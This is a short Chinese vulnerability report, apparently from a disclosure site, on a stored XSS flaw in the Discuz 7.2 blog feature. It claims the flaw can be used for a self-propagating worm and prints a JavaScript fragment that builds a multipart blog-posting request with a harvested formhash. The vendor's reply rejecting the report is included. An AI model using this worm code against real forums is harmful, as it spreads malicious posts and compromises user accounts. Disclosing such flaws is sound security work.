Discuz 7.2 存储型XSS，可编写蠕虫传播

Discuz 7.2 存储型XSS，可编写蠕虫传播。

discuz 7.2 个人空间发表博客，默认管理员可编辑源码，但管理员可在后台设置权限允许普通用户编辑。该处存在XSS弱点，可编写蠕虫进行传播。每个用户的表单hash值可在html获得，不需要考虑salt，获得cookie即可。

漏洞证明：

discuz 7.2 进行表单提交时每个用户的表单hash值不一样，但是固定的，该值可在访问用户的html中获得。如图：

然后将hash代入组包，编写蠕虫即可。var userurl=”http://demo.com/cp.php?ac=blog&blogid=&releas=2″;var fdata=”—————————–7da26139230652Content-Disposition: form-data; name=”subject”123—————————–7da26139230652Content-Disposition: form-data; name=”classid”0—————————–7da26139230652Content-Disposition: form-data; name=”message”<DIV>123</DIV>—————————–7da26139230652Content-Disposition: form-data; name=”tag”—————————–7da26139230652Content-Disposition: form-data; name=”friend”0—————————–7da26139230652Content-Disposition: form-data; name=”password”—————————–7da26139230652Content-Disposition: form-data; name=”selectgroup”—————————–7da26139230652Content-Disposition: form-data; name=”target_names”—————————–7da26139230652Content-Disposition: form-data; name=”blogsubmit”true—————————–7da26139230652Content-Disposition: form-data; name=”bbsis”0—————————–7da26139230652Content-Disposition: form-data; name=”fid”4—————————–7da26139230652Content-Disposition: form-data; name=”formhash”9186ab85—————————–7da26139230652–“;xhr.setRequestHeader(“Content-Type”,”multipart/form-data; boundary=—————————7da26139230652″);

作者：Liscker

厂商回复：

后台用户组设置处：日志全HTML标签支持处，已注明：谨慎允许，支持所有html标签可能会造成javascript脚本引起的不安全因素 。不认为这是一个漏洞。